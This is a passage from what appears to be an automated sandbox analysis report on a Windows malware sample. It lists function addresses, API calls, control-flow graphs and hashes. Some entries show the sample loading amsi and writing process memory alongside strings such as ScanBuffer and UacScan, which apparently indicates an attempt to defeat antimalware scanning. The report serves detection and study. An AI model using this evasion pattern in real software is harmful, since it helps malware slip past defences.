                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                        • String ID: Ntdll$yromeMlautriVetirW
                        • API String ID: 2719805696-3542721025
                        • Opcode ID: 09cb4b008d6c90edd18e75a7310debff8c7dad6b2d1bf2b6ea9c0da1f80046bd
                        • Instruction ID: f706feb0505ba6306ff6d6d43a2503a9d1f60b3f8cdceb713a052c8f6e9d0423
                        • Opcode Fuzzy Hash: 09cb4b008d6c90edd18e75a7310debff8c7dad6b2d1bf2b6ea9c0da1f80046bd
                        • Instruction Fuzzy Hash: 4A014C7C640218AFEB10EF98D841EAEBBEDEB4D710F518850BD00D7694DA74A9148F61
                        Function 02856D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 02856CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02856D39,?,?,?,00000000), ref: 02856D19
                        • CoCreateInstance.OLE32(?,00000000,00000005,02856E2C,00000000,00000000,02856DAB,?,00000000,02856E1B), ref: 02856D97
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: CreateFromInstanceProg
                        • String ID:
                        • API String ID: 2151042543-0
                        • Opcode ID: 24f8876d330572c559f7616e3cbdd5f0f52bcdc16ed17bc03f3bf2de5412efec
                        • Instruction ID: 2fd08f2014e768fc407adfe1d391376f911e620f9b1e602a898c152d5623552f
                        • Opcode Fuzzy Hash: 24f8876d330572c559f7616e3cbdd5f0f52bcdc16ed17bc03f3bf2de5412efec
                        • Instruction Fuzzy Hash: 5901F77D608728AFF715DF64DC1296FBBADE749B10BE10835F901E2640FA359D00C865
                        Function 02841724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5572 2841724-2841736 5573 284173c-284174c 5572->5573 5574 2841968-284196d 5572->5574 5575 28417a4-28417ad 5573->5575 5576 284174e-284175b 5573->5576 5577 2841a80-2841a83 5574->5577 5578 2841973-2841984 5574->5578 5575->5576 5583 28417af-28417bb 5575->5583 5579 2841774-2841780 5576->5579 5580 284175d-284176a 5576->5580 5584 2841684-28416ad VirtualAlloc 5577->5584 5585 2841a89-2841a8b 5577->5585 5581 2841986-28419a2 5578->5581 5582 2841938-2841945 5578->5582 5589 28417f0-28417f9 5579->5589 5590 2841782-2841790 5579->5590 5586 2841794-28417a1 5580->5586 5587 284176c-2841770 5580->5587 5591 28419a4-28419ac 5581->5591 5592 28419b0-28419bf 5581->5592 5582->5581 5588 2841947-284195b Sleep 5582->5588 5583->5576 5593 28417bd-28417c9 5583->5593 5594 28416df-28416e5 5584->5594 5595 28416af-28416dc call 2841644 5584->5595 5588->5581 5596 284195d-2841964 Sleep 5588->5596 5601 284182c-2841836 5589->5601 5602 28417fb-2841808 5589->5602 5597 2841a0c-2841a22 5591->5597 5598 28419c1-28419d5 5592->5598 5599 28419d8-28419e0 5592->5599 5593->5576 5600 28417cb-28417de Sleep 5593->5600 5595->5594 5596->5582 5606 2841a24-2841a32 5597->5606 5607 2841a3b-2841a47 5597->5607 5598->5597 5611 28419e2-28419fa 5599->5611 5612 28419fc-28419fe call 28415cc 5599->5612 5600->5576 5610 28417e4-28417eb Sleep 5600->5610 5608 28418a8-28418b4 5601->5608 5609 2841838-2841863 5601->5609 5602->5601 5604 284180a-284181e Sleep 5602->5604 5604->5601 5614 2841820-2841827 Sleep 5604->5614 5606->5607 5615 2841a34 5606->5615 5618 2841a68 5607->5618 5619 2841a49-2841a5c 5607->5619 5620 28418b6-28418c8 5608->5620 5621 28418dc-28418eb call 28415cc 5608->5621 5616 2841865-2841873 5609->5616 5617 284187c-284188a 5609->5617 5610->5575 5622 2841a03-2841a0b 5611->5622 5612->5622 5614->5602 5615->5607 5616->5617 5623 2841875 5616->5623 5624 284188c-28418a6 call 2841500 5617->5624 5625 28418f8 5617->5625 5626 2841a6d-2841a7f 5618->5626 5619->5626 5627 2841a5e-2841a63 call 2841500 5619->5627 5628 28418cc-28418da 5620->5628 5629 28418ca 5620->5629 5632 28418fd-2841936 5621->5632 5635 28418ed-28418f7 5621->5635 5623->5617 5624->5632 5625->5632 5627->5626 5628->5632 5629->5628
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 028417D0
                        • Sleep.KERNEL32(0000000A,00000000), ref: 028417E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 7640db97b83190891a60d56592c7567d38a4049a69f964a7f0626078e9c83061
                        • Instruction ID: 2dc02cb14d263af323e39ee7b0f846205baa2a715f0e5e67937d6bc1dd411aeb
                        • Opcode Fuzzy Hash: 7640db97b83190891a60d56592c7567d38a4049a69f964a7f0626078e9c83061
                        • Instruction Fuzzy Hash: 24B1367EA003949BC719CF28E8C8365BBE1EB94314F18866ED54DCB3C5DB7094A5CB90
                        Function 02858704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • LoadLibraryW.KERNEL32(amsi), ref: 0285870D
                          • Part of subcall function 028580C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(?,?), ref: 02858125
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0285876C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                        • String ID: DllGetClassObject$W$amsi
                        • API String ID: 941070894-2671292670
                        • Opcode ID: 51987e6f8be701a36839f7915221bf68b74c4a55278cb47817d6976c06f1fd9a
                        • Instruction ID: fa3ed2d19b4251b84c1b97ea4ee0405d0a04209a27595b4d9ee38ac4c18df085
                        • Opcode Fuzzy Hash: 51987e6f8be701a36839f7915221bf68b74c4a55278cb47817d6976c06f1fd9a
                        • Instruction Fuzzy Hash: FFF0C85844C391BAE201E67C8C45F4BBFCD4B52224F04CA0DB5E8D62D2D679D1048BB7
                        Function 02841A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5652 2841a8c-2841a9b 5653 2841aa1-2841aa5 5652->5653 5654 2841b6c-2841b6f 5652->5654 5657 2841aa7-2841aae 5653->5657 5658 2841b08-2841b11 5653->5658 5655 2841b75-2841b7f 5654->5655 5656 2841c5c-2841c60 5654->5656 5660 2841b81-2841b8d 5655->5660 5661 2841b3c-2841b49 5655->5661 5664 2841c66-2841c6b 5656->5664 5665 28416e8-284170b call 2841644 VirtualFree 5656->5665 5662 2841ab0-2841abb 5657->5662 5663 2841adc-2841ade 5657->5663 5658->5657 5659 2841b13-2841b27 Sleep 5658->5659 5659->5657 5666 2841b2d-2841b38 Sleep 5659->5666 5668 2841bc4-2841bd2 5660->5668 5669 2841b8f-2841b92 5660->5669 5661->5660 5667 2841b4b-2841b5f Sleep 5661->5667 5670 2841ac4-2841ad9 5662->5670 5671 2841abd-2841ac2 5662->5671 5673 2841ae0-2841af1 5663->5673 5674 2841af3 5663->5674 5683 2841716 5665->5683 5684 284170d-2841714 5665->5684 5666->5658 5667->5660 5677 2841b61-2841b68 Sleep 5667->5677 5675 2841bd4-2841bd9 call 28414c0 5668->5675 5676 2841b96-2841b9a 5668->5676 5669->5676 5673->5674 5679 2841af6-2841b03 5673->5679 5674->5679 5675->5676 5681 2841bdc-2841be9 5676->5681 5682 2841b9c-2841ba2 5676->5682 5677->5661 5679->5655 5681->5682 5686 2841beb-2841bf2 call 28414c0 5681->5686 5688 2841bf4-2841bfe 5682->5688 5689 2841ba4-2841bc2 call 2841500 5682->5689 5687 2841719-2841723 5683->5687 5684->5687 5686->5682 5691 2841c00-2841c28 VirtualFree 5688->5691 5692 2841c2c-2841c59 call 2841560 5688->5692
                        APIs
                        • Sleep.KERNEL32(00000000,?,?,00000000,02841FE4), ref: 02841B17
                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02841FE4), ref: 02841B31
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: b1594da80cfccb674f5a0b00b92519992f70a26ca0d9a6f1b108386db14ad500
                        • Instruction ID: cfbf5778518d09f946af85368b8061f0c8abd31d05350940ff7a815ac215478b
                        • Opcode Fuzzy Hash: b1594da80cfccb674f5a0b00b92519992f70a26ca0d9a6f1b108386db14ad500
                        • Instruction Fuzzy Hash: 7E51C07DA012448FD715CF6CD988766BBD0AB45318F1885AEE94CCB2C6EF70C495CBA1
                        Function 0285E72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0285E86A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: CheckConnectionInternet
                        • String ID: Initialize$OpenSession$ScanBuffer
                        • API String ID: 3847983778-3852638603
                        • Opcode ID: 905ee7c21354ddbd8c8276bcdcb2e3bfb3802b944bfa4e2cf55e94c7f5c9d0f5
                        • Instruction ID: ba7237dab580b62d71bbb1b18d7a66a365d3579701395d63d9cbf1fd7801dc6b
                        • Opcode Fuzzy Hash: 905ee7c21354ddbd8c8276bcdcb2e3bfb3802b944bfa4e2cf55e94c7f5c9d0f5
                        • Instruction Fuzzy Hash: 4F41EE3DA1021C9BEB10EBA8DC81B9E77FAEF49710F214425E841E7655DE78AE058F11
                        Function 0285881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                        • GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        • FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                        • String ID:
                        • API String ID: 1543721669-0
                        • Opcode ID: 6c189d0d2ac18ba7a4474130e305bf849e9444c00f486f6dfbd41f583bb36df9
                        • Instruction ID: a6810f23c2cb5b171a8fe0782988fb71fcf1d4de2943108c26d3967e20f40c82
                        • Opcode Fuzzy Hash: 6c189d0d2ac18ba7a4474130e305bf849e9444c00f486f6dfbd41f583bb36df9
                        • Instruction Fuzzy Hash: A9118E7CA4031CABF710FBBCCC11A1E7BAAEB46700F4144257E04EB7A4DEB899109B16
                        Function 0284E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5855 284e2e4-284e2f0 5856 284e2f2-284e2f8 VariantClear call 284dfb0 5855->5856 5857 284e2ff-284e304 5855->5857 5861 284e2fd 5856->5861 5859 284e315-284e31a 5857->5859 5860 284e306-284e313 call 28444ac 5857->5860 5863 284e326-284e32b 5859->5863 5864 284e31c-284e324 5859->5864 5867 284e35b-284e35e 5860->5867 5861->5867 5865 284e336-284e341 call 2852e24 5863->5865 5866 284e32d-284e334 call 284e168 5863->5866 5864->5867 5874 284e343-284e34d 5865->5874 5875 284e34f-284e356 VariantClear VariantInit 5865->5875 5866->5867 5874->5867 5875->5867
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 5be27f8e7e19bdddb7f97ed2a659d6bafc129b935fc5d2ca92871270816a055b
                        • Instruction ID: d166de27976c9e591bd5c83aac2ffb0d74cc8d98b3d5a63d92fee7bdd57f61bd
                        • Opcode Fuzzy Hash: 5be27f8e7e19bdddb7f97ed2a659d6bafc129b935fc5d2ca92871270816a055b
                        • Instruction Fuzzy Hash: 5EF0623C70921CC7DB367B3C8984669679A7F4471D75C5476B80ADB205CF249C05CB63
                        Function 0285705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5877 285705c-28570a6 call 2844eec 5880 28570bf-28570c1 5877->5880 5881 28570a8-28570ba call 284afc8 call 2843e68 5877->5881 5883 28570c7-28570db 5880->5883 5884 2857288-28572af 5880->5884 5881->5880 5888 28570dd-28570f7 5883->5888 5886 28572b1-28572c0 5884->5886 5887 28572d9-28572dc 5884->5887 5890 28572c7-28572d7 5886->5890 5891 28572c2 5886->5891 5892 28572ed-2857309 5887->5892 5893 28572de-28572e0 5887->5893 5894 2857111-2857115 5888->5894 5895 28570f9-285710c 5888->5895 5890->5892 5891->5890 5905 285730e-2857310 5892->5905 5893->5892 5896 28572e2-28572e6 5893->5896 5898 2857117-2857126 5894->5898 5899 285718b-285718d 5894->5899 5897 285727f-2857282 5895->5897 5896->5892 5902 28572e8 5896->5902 5897->5884 5897->5888 5903 2857158-2857180 call 284535c 5898->5903 5904 2857128-2857156 call 284535c 5898->5904 5900 28571d4-28571d8 5899->5900 5901 285718f-2857193 5899->5901 5908 285724d-2857264 5900->5908 5909 28571da-28571e2 5900->5909 5906 2857195-285719f 5901->5906 5907 28571b7-28571cf 5901->5907 5902->5892 5925 2857183-2857186 5903->5925 5904->5925 5911 2857312-2857315 call 2857634 5905->5911 5912 285731a-285731f 5905->5912 5906->5907 5917 28571a1-28571b2 call 284ea58 5906->5917 5918 285727b 5907->5918 5908->5918 5922 2857266-285726a 5908->5922 5919 28571e4-2857220 call 284535c 5909->5919 5920 2857222-285724b 5909->5920 5911->5912 5915 2857321-285732e 5912->5915 5916 285733d-285734f 5912->5916 5926 2857330-2857334 call 2845338 5915->5926 5927 2857339-285733b 5915->5927 5932 2857351-2857361 SysFreeString 5916->5932 5933 2857363 5916->5933 5917->5907 5918->5897 5919->5918 5920->5918 5922->5918 5924 285726c-2857278 5922->5924 5924->5918 5925->5918 5926->5927 5927->5915 5927->5916 5932->5932 5932->5933
                        APIs
                        • SysFreeString.OLEAUT32(?), ref: 0285735A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FreeString
                        • String ID: H
                        • API String ID: 3341692771-2852464175
                        • Opcode ID: aa64ff81d18bc59e96d5acb9b514b64f253319f62e6436bb0f8b23b07f1db74e
                        • Instruction ID: 8f205081cea5fb1bace76f69607664a8b8e7cef359195f11ff3c6e2e87500ae0
                        • Opcode Fuzzy Hash: aa64ff81d18bc59e96d5acb9b514b64f253319f62e6436bb0f8b23b07f1db74e
                        • Instruction Fuzzy Hash: 1CB1C078A016189FDB14CF99D980AADFBF6FF49314F648169E80AEB364D730A845CF50
                        Function 0284E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5935 284e37c-284e38c 5936 284e38e-284e47c call 284e37c 5935->5936 5937 284e3ab-284e3af 5935->5937 5939 284e3b1-284e3b6 5937->5939 5940 284e3b8-284e3c4 VariantInit 5937->5940 5942 284e3c7-284e3e0 5939->5942 5940->5942 5944 284e3f0-284e3f5 5942->5944 5945 284e3e2 5942->5945 5946 284e3f7-284e3fa 5944->5946 5947 284e3fc-284e403 5944->5947 5945->5947 5948 284e3e4-284e3e7 5945->5948 5946->5947 5949 284e41d-284e429 call 2852e24 5946->5949 5950 284e405-284e412 call 28574c5 5947->5950 5951 284e447-284e458 5947->5951 5948->5947 5952 284e3e9-284e3ec 5948->5952 5961 284e442 call 284dc18 5949->5961 5962 284e42b-284e440 5949->5962 5956 284e418-284e41b 5950->5956 5958 284e46f 5951->5958 5959 284e45a-284e46a call 284e78c call 284e360 5951->5959 5952->5947 5955 284e3ee 5952->5955 5955->5949 5956->5951 5959->5958 5961->5951 5962->5951
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: InitVariant
                        • String ID:
                        • API String ID: 1927566239-0
                        • Opcode ID: 384f48b63f6c7abfb00c4ec8576c7358671a2867bc2708c5b905f8cfe7f23507
                        • Instruction ID: 6ebd5aa8ba869757b71ded20f18f0ba7001d20a7e7ec14862c10a040d20c88e5
                        • Opcode Fuzzy Hash: 384f48b63f6c7abfb00c4ec8576c7358671a2867bc2708c5b905f8cfe7f23507
                        • Instruction Fuzzy Hash: 4D31507D60061CAFDB11DFACC884AAA77A8FB0C708F8845A1E909D3640DB34D950CB62
                        Function 02856CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02856D39,?,?,?,00000000), ref: 02856D19
                          • Part of subcall function 02844C0C: SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FreeFromProgString
                        • String ID:
                        • API String ID: 4225568880-0
                        • Opcode ID: 5087ba58ea1c9190a7b6f558db69c0a701099273c52a6be6fddd24f184811dc4
                        • Instruction ID: 1278a9ea28dada73efc882a44e328bc4237826926ab77ccf946a32265f908063
                        • Opcode Fuzzy Hash: 5087ba58ea1c9190a7b6f558db69c0a701099273c52a6be6fddd24f184811dc4
                        • Instruction Fuzzy Hash: E0E06D7D604368BFF711EBA9CC52A5A77ADDB89B10B9108B1A800D7600EA75BE008866
                        Function 02845814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 02845832
                          • Part of subcall function 02845A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02840000,0286E790), ref: 02845A94
                          • Part of subcall function 02845A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AB2
                          • Part of subcall function 02845A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AD0
                          • Part of subcall function 02845A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02845AEE
                          • Part of subcall function 02845A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02845B37
                          • Part of subcall function 02845A78: RegQueryValueExA.ADVAPI32(?,02845CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001), ref: 02845B55
                          • Part of subcall function 02845A78: RegCloseKey.ADVAPI32(?,02845B84,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02845B77
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Open$FileModuleNameQueryValue$Close
                        • String ID:
                        • API String ID: 2796650324-0
                        • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                        • Instruction ID: 14e444ed7bb87888b056900b454d4173112a3f5da1ddce64108a1a5b7448e489
                        • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                        • Instruction Fuzzy Hash: CAE06D79A002188BCB10DE5CC8C0A4B37D8AB09750F400565EC58DF34AEB74E9608BD1
                        Function 02847E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesA.KERNEL32(00000000,?,0285FD00,ScanString,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString,028A237C,0286B40C,UacScan,028A237C,0286B40C,UacInitialize), ref: 02847E1B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
